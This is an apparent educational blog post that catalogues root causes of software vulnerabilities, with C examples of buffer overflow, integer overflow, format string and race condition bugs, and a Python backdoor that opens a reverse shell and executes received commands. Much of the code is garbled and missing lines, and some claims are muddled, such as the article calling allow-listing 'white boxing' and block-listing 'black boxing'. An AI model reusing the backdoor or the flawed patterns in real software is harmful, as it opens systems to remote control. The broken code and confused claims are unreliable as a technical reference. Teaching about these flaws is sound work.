Common Root Causes of Software Vulnerabilities That You Should Know

Software vulnerabilities can be broadly categorized into software defects and configuration errors. But not all the software defects and configuration errors are vulnerabilities. Software defects are the errors made during software design and development phases of the software development lifecycle. Further, software defects can be sub categorized into design flaws and coding flaws.

Design flaws are the violations of best practices at the early stage of software development made by software designers. If software design flaws are not fixed before the building process, find and remove those vulnerabilities after the software building process complete is very challenging.

1.1 Common Security Design Flaws

Security Design flawsDescription
1.1.1 No authentication mechanism: The system does not have any authentication mechanism. An unauthorized
user can access confidential information without any identity
1.1.2 Downgraded authentication:Authenticate with the weaker or obsolete authentication mechanism
1.1.3 Use only single-factor authentication:It refers to the number of identity evidence system uses to provide
access. For example, usage of username and password only.
1.1.4 Poor session management:Session information is not properly secured in the lifecycle
1.1.5 Poor crypto key management:Crypto keys are not managed securely. For example, reusing keys, storing
keys alongside with the data.
1.1.6 No access controls:Access control refers limiting to what a user can do, which resources
can access.
1.1.7 No authorization:Absence of checking to see if a user has proper permission to view a
specific resource according to the access control rules defined.
1.1.8 Missing reauthentication:Absence of reauthentication mechanism after a long idle time.
1.1.9 Unmonitored execution:Absence of monitoring Execution of external applications and its
resource consumption.
1.1.10 No context when authorizing:Conditional checking is missing when authorizing.
1.1.11 No authorization revoking:No mechanism to cancel the authorization
1.1.12 Storing data insecure:Storing sensitive data like password in clear text.
1.1.13 Poor credential management:Absence of best practice of credential management through the whole
process. Clear text hard coded password, transmitting password in clear
1.1.14 Data exposure:Leaving the private information in publicly accessible places
1.1.15 Weak encryption:Usage of the weak encryption algorithm or low-key length
1.1.16 No data input validation:Absence of checking the data provided by users.
1.1.17 Poor auditing:Absence of logging the critical operation by the application.
1.1.18 Uncontrolled of resource consumption:Application is over-consuming the resources including memory flash
storage, database connection without properly controlling the allocation

Object-oriented programming is the concept based on the real-world object
which has attributes like encapsulation, inheritance, coupling, abstraction,
cohesion, design size, complexity. These OOP properties will be defined in the
design phase of the SDLC. Somali and Shashank proved that the design of
the attributes will affect the security of the software. It has been concluded
that complexity negatively affects security, vulnerabilities get increased two
times as if complexity increased. It has been Proved that complexity is a
danger when it comes to security.

The coupling attribute is also having a negative impact on security.
Vulnerabilities increased when the coupling count increased. The vulnerability
can be low when the inheritance was low. But vulnerability became severe when
the inheritance was high. Proper inheritance should be required. when cohesion
and encapsulation were high, the highest level of security was achieved and
it’s vice versa.

1.2 Coding Flaws

Coding flaws can be vulnerabilities that are made by programmers during the
development stage of the software development cycle. The state of being not
operated as defined in the design. Most of the coding flaws are caused by
mistake and lack of security awareness. Sometimes developers leave backdoors
for debugging purposes. But it is a huge security issue. Coding flaws can be
identified in the software testing or manual coding review. Below is the
list of common coding flaws in software.

1.2.1 Buffer Overflow

Buffer overflow is one of the dangerous weaknesses in the application. it is
created by the programmers who do use an insecure function instead of
alternative secure functions. CWE listed buffer overflow as the first most
dangerous software error out of twenty-five.

The buffer overflow occurs when during the execution, the application writes
the data beyond the pre-allocated fixed size of memory buffer. Some
programming languages including java, python have protection mechanism by
default, but C/C++ and Assembly do allow to overwrite buffer. The below figure
shows a small program which is vulnerable to buffer overflow.

This program accepts the value from the user and saves it to the str array
without validating the size of the buffer. If the value exceeds more than 4
characters, a buffer overflow will happen as well as program will crash with a
segmentation fault

#include <stdio.h>
int main( ) {


printf( "Enter a value :");

gets( str );

printf( "nYou entered: ");

puts( str );

return 0;
stack memory layout

An application memory divided into the heap, stack, global and code. the above
figure shows the stack portion of the application memory. A stack is a fixed
memory block where values of temporary local variables, methods, and addresses
of the functions and variables will be stored.

In the above figure shows that the buffer can store up to 8 A’s . in this
context, if the application writes 16 A’s EBP will get overwritten, if the
application writes 20 A’s, EIP will get overwritten. EIP has the address of
the next command execution. After overwriting EIP with invalid characters, the
program failed to execute the next command and crash with a segmentation

1.2.2 Integer Overflow

An integer is variable which represents the whole number whether it can
be zero or positive or negative number. it can store up to 32-bit numbers. If
the program assigns any number greater than 32bit will cause integer overflow.
The below figure 5-3 shows a program vulnerable to integer overflow and it
will show as output 1 because the result cannot be represented in integer, and
it will be reduced using modulo in accordance iso standard.

#include <stdio.h>
int main()
int y=1;

return 0;
1.2.3 Uncontrolled Format String

The format string parameter defines the type of conversion of c and
other programming languages.% d denotes the decimal value and %s denotes the
string. if printf has the integer variable and %s defined as a format string,
the program will crash.

The below figure 5-4 shows the program which vulnerable to Uncontrolled Format
string. User input from the command line is stored in a buffer and displayed
to the terminal. if the format string is passed with the input, the program
will respond to it. For example, if %%p passed with any value, it will
reveal the memory address of the value.

#include <stdio.h>

int main (int argc, char **argv)

char buffer [50];

snprintf ( buffer, sizeof buffer, argv [1] ) ;

printf ("Data input: %s " ,   buffer
) ;

return 0 ;
1.2.4 Race Condition

Race condition will occur when the shared data has been accessing by multiple
processes at the same time instead of in a sequence manner. Below figure 5-5
shows a sample program that is vulnerable to a race condition. f2 should be
executed after f1 finished the process. Here, f2 will be executed before
f1 finished the process. It will not produce the expected results.

#include <stdio.h>
#include <pthread.h>
int x=0;
printf(" intial value of x: %d",x);
{ x=x+i;}
printf("n value of
x after 1st function: %d",x);
return 0;}
int f2(){

for(int i=0;i<3;i++)
{x=x+i; }
final value of x: %d",x);
return 0;}
int main(){

pthread_t t1, t2;
pthread_create(&t1, NULL, f1,
pthread_create(&t2, NULL, f2, NULL);

pthread_join( t1, NULL);
pthread_join( t2, NULL);

return 0;}
1.2.5 Backdoor

A backdoor is a piece of code hidden within the source of other application
which gives access to the system without any authentication. Below figure 5-6
shows a sample backdoor code written in python which can be added to any other
source code of the application. If the application executed, the back door
will also be executed and try to establish with reverse shell with the server
as well as the server can control the client once the connection has been
established successfully.

import socket
import os
import subprocess
target_host =
target_port = 69
data = client.recv(1024)

if data[:2].decode("utf-8") == 'cd':

if len(data) >
cmd =
subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE )

output_bytes =

output_str = str(output_bytes, "utf-8")

client.send(str.encode(output_str + str(os.getcwd()) + '$'))

1.2.6 Insecure Random Number Generator

Insecure randomness occurs when the pseudo-random number generator
generates a predictable value. Below figure 5-7 shows a sample random
generator program that is vulnerable. It will predict the random number based
on the current time. If the code is executed, variable r1 and r2 will
have the same numbers.

import random, time

r1 =
random.randrange(2000,5000 )

r2 =
random.randrange(2000, 5000)


1.3 Configuration Errors

Configuration errors are other causes of vulnerability. these types of
vulnerabilities come from configuration mistakes by IT administrators that
enable successful exploitation of the system. Configuration errors can be
categorized into enabling unnecessary or dangers services that allow access to
the system.

1.3.1 Enabling Unnecessary or Dangerous Services

It is a
common configuration error which goes beyond the operational requirements. In
a cybersecurity context, it could be related to allowing everything except the
malicious which also called white boxing rather than block everything except
legitimate activity which is called black boxing. Black boxing is the safest
way and it does not need technical expertise.

1.3.2 User Access Administration Error

It is another configuration error that allows unauthorized users to access the
system or process improper privilege authorization. This type of vulnerability
is very dangerous because it provides easy access to the hackers and they
might impersonate as a legitimate user. therefore, it is very difficult to get
caught by intrusion detection systems. Processing of improper privilege
authorization helps legitimate users to misuse the systems.

  • Subaharan

    Subaharan Nithiyananthan, a graduate of Staffordshire University, UK, Followed BEng (Hons) in Computer Networks and Security. He is the founder of MobilePcBlog and information security enthusiast also Publishing articles for MobilePcBlog. He has a couple of professional IT certifications such as CCNA, CEH, and NSE2, AZ500. Currently, Working as an Engineer - Network & Security for Connex Information Technologies.

Leave a comment

Your email address will not be published. Required fields are marked *